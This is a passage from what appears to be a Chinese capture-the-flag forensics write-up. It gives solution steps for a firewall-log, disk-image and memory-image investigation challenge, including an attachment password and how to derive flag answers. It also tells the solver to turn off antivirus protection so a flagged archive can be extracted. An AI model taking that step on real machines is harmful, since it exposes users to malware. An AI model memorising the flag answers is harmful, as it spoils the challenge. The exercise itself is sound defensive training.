火绒报毒（拦截导致提取出来的压缩包损坏），关闭火绒防护后重新 foremost 一遍
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0NDIxMjkwNS5wbmcmcG9zX2lkPUJkUmFGQ3Fm
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0NDQxNDU0Ni5wbmcmcG9zX2lkPUZnZmJHNVE4
发现对应的不是这一问，修复一下压缩包后得到 flag
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0NDczNDEzMC5wbmcmcG9zX2lkPTdOMVZBRmRX
_6

通过aes解密得到的flag
sc05_1

近日某公司网络管理员老张在对安全设备进行日常巡检的过程中，发现防火墙设备日志中产生了 1 条高危告警，告警 IP 为 134.6.4.12（简称 IP1）。在监测到可疑网络活动后，老张立刻对磁盘和内存制作了镜像。为考察自己刚收的第一个徒弟李华，老张按部就班，布置了 5 道题目。如果你是李华，请你根据提供的防火墙日志、磁盘镜像及内存镜像文件对主机开展网络安全检查分析，并根据 5 道题目提示，计算并提交相应 flag。
（本题附件见于提前下载的加密附件38c44f100028b56e09dc48522385fa95.7z，解压密码为 37af3744-53eb-49fd-854a-f6f79bbf5b1c）
_1

IP1 地址首次被请求的时间是什么时候？计算内容如：2020/05/18_19:35:10，提交格式：flag{32位大写MD5值}
在防火墙日志里直接 Ctrl+F 搜索 IP1，取最早一条记录的时间，按题目给的格式拼好后计算 MD5（大写）即可
